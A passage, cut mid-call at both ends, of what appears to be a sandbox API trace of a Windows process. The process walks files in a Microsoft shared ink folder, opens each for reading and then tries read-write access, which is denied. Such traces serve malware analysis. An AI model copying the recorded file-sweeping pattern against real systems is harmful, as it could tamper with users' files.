(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.346] AreFileApisANSI () returned 1 [0082.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", lpUsedDefaultChar=0x0) returned 72 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0082.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.347] AreFileApisANSI () returned 1 [0082.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0082.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 72 [0082.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.532] GetFileType (hFile=0x334) returned 0x1 [0082.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0082.532] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.532] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.532] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.533] CloseHandle (hObject=0x334) returned 1 [0082.533] AreFileApisANSI () returned 1 [0082.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0082.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 72 [0082.533] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.533] GetLastError () returned 0x5 [0082.533] GetLastError () returned 0x5 [0082.533] SetLastError (dwErrCode=0x5) [0082.533] GetLastError () returned 0x5 [0082.533] SetLastError (dwErrCode=0x5) [0082.533] GetLastError () returned 0x5 [0082.533] SetLastError (dwErrCode=0x5) [0082.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0082.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0082.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.533] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x148de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0082.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0082.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.534] AreFileApisANSI () returned 1 [0082.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi", lpUsedDefaultChar=0x0) returned 73 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.535] AreFileApisANSI () returned 1 [0082.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0082.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 73 [0082.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.535] GetFileType (hFile=0x334) returned 0x1 [0082.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0082.535] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.535] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.535] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.536] CloseHandle (hObject=0x334) returned 1 [0082.536] AreFileApisANSI () returned 1 [0082.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x853a0 [0082.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 73 [0082.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.536] GetLastError () returned 0x5 [0082.536] GetLastError () returned 0x5 [0082.536] SetLastError (dwErrCode=0x5) [0082.536] GetLastError () returned 0x5 [0082.536] SetLastError (dwErrCode=0x5) [0082.536] GetLastError () returned 0x5 [0082.536] SetLastError (dwErrCode=0x5) [0082.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0082.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0082.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.536] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2bfcc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0082.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0082.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.537] AreFileApisANSI () returned 1 [0082.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi", lpUsedDefaultChar=0x0) returned 69 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.538] AreFileApisANSI () returned 1 [0082.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0082.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0082.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 69 [0082.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.538] GetFileType (hFile=0x334) returned 0x1 [0082.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0082.538] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.538] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.538] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.539] CloseHandle (hObject=0x334) returned 1 [0082.539] AreFileApisANSI () returned 1 [0082.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0082.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0082.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 69 [0082.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.539] GetLastError () returned 0x5 [0082.539] GetLastError () returned 0x5 [0082.539] SetLastError (dwErrCode=0x5) [0082.539] GetLastError () returned 0x5 [0082.539] SetLastError (dwErrCode=0x5) [0082.539] GetLastError () returned 0x5 [0082.539] SetLastError (dwErrCode=0x5) [0082.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0082.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x32e18, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.540] HeapFree 